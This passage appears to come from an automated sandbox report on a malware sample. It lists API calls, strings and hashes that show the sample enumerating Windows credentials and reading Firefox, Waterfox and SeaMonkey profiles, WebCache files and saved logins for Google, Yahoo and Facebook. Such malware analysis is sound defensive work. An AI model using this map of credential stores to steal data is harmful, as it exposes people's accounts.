                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                      • wcslen.MSVCRT ref: 0040C82C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                      • API String ID: 62308376-4196376884
                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                      APIs
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                      • wcslen.MSVCRT ref: 0040BE06
                                      • _wcsncoll.MSVCRT ref: 0040BE38
                                      • memset.MSVCRT ref: 0040BE91
                                      • memcpy.MSVCRT ref: 0040BEB2
                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                      • wcschr.MSVCRT ref: 0040BF24
                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                      • String ID:
                                      • API String ID: 3191383707-0
                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                      APIs
                                      • memset.MSVCRT ref: 00403CBF
                                      • memset.MSVCRT ref: 00403CD4
                                      • memset.MSVCRT ref: 00403CE9
                                      • memset.MSVCRT ref: 00403CFE
                                      • memset.MSVCRT ref: 00403D13
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403DDA
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                      • String ID: Waterfox$Waterfox\Profiles
                                      • API String ID: 3527940856-11920434
                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                      APIs
                                      • memset.MSVCRT ref: 00403E50
                                      • memset.MSVCRT ref: 00403E65
                                      • memset.MSVCRT ref: 00403E7A
                                      • memset.MSVCRT ref: 00403E8F
                                      • memset.MSVCRT ref: 00403EA4
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403F6B
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                      • API String ID: 3527940856-2068335096
                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                      APIs
                                      • memset.MSVCRT ref: 00403FE1
                                      • memset.MSVCRT ref: 00403FF6
                                      • memset.MSVCRT ref: 0040400B
                                      • memset.MSVCRT ref: 00404020
                                      • memset.MSVCRT ref: 00404035
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 004040FC
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                      • API String ID: 3527940856-3369679110
                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                      • API String ID: 3510742995-2641926074
                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                      APIs
                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 004033B7
                                      • memcpy.MSVCRT ref: 004033D0
                                      • wcscmp.MSVCRT ref: 004033FC
                                      • _wcsicmp.MSVCRT ref: 00403439
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                      • String ID: $0.@
                                      • API String ID: 3030842498-1896041820
                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 2941347001-0
                                      • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                      • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                      APIs
                                      • memset.MSVCRT ref: 00403C09
                                      • memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                      • wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                      • wcscat.MSVCRT ref: 00403C70
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memsetwcscat$Closewcscpywcslen
                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                      • API String ID: 3249829328-1174173950
                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                      APIs
                                      • memset.MSVCRT ref: 0040A824
                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • wcscpy.MSVCRT ref: 0040A854
                                      • wcscat.MSVCRT ref: 0040A86A
                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 669240632-0
                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                      APIs
                                      • wcschr.MSVCRT ref: 00414458
                                      • _snwprintf.MSVCRT ref: 0041447D
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                      • String ID: "%s"
                                      • API String ID: 1343145685-3297466227
                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProcessTimes
                                      • String ID: GetProcessTimes$kernel32.dll
                                      • API String ID: 1714573020-3385500049
                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                      APIs
                                      • memset.MSVCRT ref: 004087D6
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                      • memset.MSVCRT ref: 00408828
                                      • memset.MSVCRT ref: 00408840
                                      • memset.MSVCRT ref: 00408858
                                      • memset.MSVCRT ref: 00408870
                                      • memset.MSVCRT ref: 00408888
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                      • String ID:
                                      • API String ID: 2911713577-0
                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: @ $SQLite format 3
                                      • API String ID: 1475443563-3708268960
                                      • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                      • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                      APIs
                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      • memset.MSVCRT ref: 00414C87
                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                      • wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressCloseProcVersionmemsetwcscpy
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                      • API String ID: 2705122986-2036018995
                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _wcsicmpqsort
                                      • String ID: /nosort$/sort
                                      • API String ID: 1579243037-1578091866
                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                      APIs
                                      • memset.MSVCRT ref: 0040E60F
                                      • memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Strings
                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                      • API String ID: 3354267031-2114579845
                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                      APIs
                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID:
                                      • API String ID: 3473537107-0
                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                      APIs
                                      Strings
                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                      • API String ID: 2221118986-1725073988
                                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                      APIs
                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotificationSleep
                                      • String ID: }A
                                      • API String ID: 1821831730-2138825249
                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
